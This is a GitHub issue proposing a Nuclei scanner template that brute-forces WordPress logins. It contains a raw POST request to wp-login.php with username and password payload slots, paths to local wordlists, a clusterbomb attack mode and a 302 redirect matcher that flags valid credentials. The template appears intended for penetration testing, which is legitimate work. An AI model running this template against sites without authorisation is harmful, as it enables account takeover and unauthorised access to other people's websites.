### ISSUE TITLE
[nuclei-template] Wordpress login bruteforce

### ISSUE THREAD

**Issue by ks6274** [projectdiscovery/nuclei-templates#2462]
**Template Details**

```yaml

id: wordpress-login-bruteforce
info:
  name: wordpress-login-bruteforce
  author: evolutionsec
  severity: medium
  tags: wordpress,default-login,login,bruteforce

requests:
  - raw:
    - |
      POST /wp-login.php HTTP/1.1 #Verify the login URL and make necessary changes.
      Host: {{Hostname}}
      Content-Length: 106
      Cache-Control: max-age=0
      Origin: {{BaseURL}}
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Referer: {{BaseURL}}
      Accept-Encoding: gzip,deflate
      Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
      Cookie: wordpress_test_cookie=WP%20Cookie%20check #check the cookie string from captured base request and change accordingly.
      Connection: close

      log=§users§&pwd=§passwords§ #marked payload in the request

    payloads:
      users: /home/kali/usernames.txt #enter the path of the wordlist for usernames
      passwords: /home/kali/passwords.txt #enter the path of the wordlist for passwords

    attack: clusterbomb #clusterbomb attack type

    matchers: #initial matchers set based on redirection when credentials are correct.
      - type: status
        status:
          - 302
        part: header

```
